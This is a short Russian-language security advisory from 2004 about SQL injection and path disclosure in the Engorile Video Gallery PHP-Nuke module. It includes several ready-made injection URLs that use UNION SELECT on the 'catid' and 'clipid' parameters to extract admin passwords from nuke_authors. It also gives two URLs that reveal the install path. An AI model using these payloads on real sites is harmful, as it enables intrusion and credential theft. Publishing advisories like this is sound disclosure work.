Несколько уязвимостей в Engorile Video Gallery
| Дата публикации: | 28.04.2004 |
| Всего просмотров: | 1287 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Engorile Video Gallery 0.1 Beta 5
Описание: Несколько уязвимостей обнаружено в Engorile Video Gallery. Удаленный пользователь может внедрить SQL команды, которые будут выполнены на основной базе данных. Удаленный пользователь может также определить инсталляционный путь. Программа не достаточно проверяет правильность данных, представленных пользователем в параметрах 'catid' и 'clipid': http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELE CT%20pwd%20FROM%20nuke_authors&catid=1 http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors http://[tar get]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1 http://[target]/modules.php?name=Video_Gallery&l_op=v oteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1Также удаленный пользователь может определить инсталляционный путь: http://[target]/modules.php?name =Video_Gallery&l_op=viewcat&catid=darkbicho http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1 URL производителя: http://videogallery.engorile.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Multiple vulnerabilities PHP-Nuke Video Gallery Module for PHP-Nuke |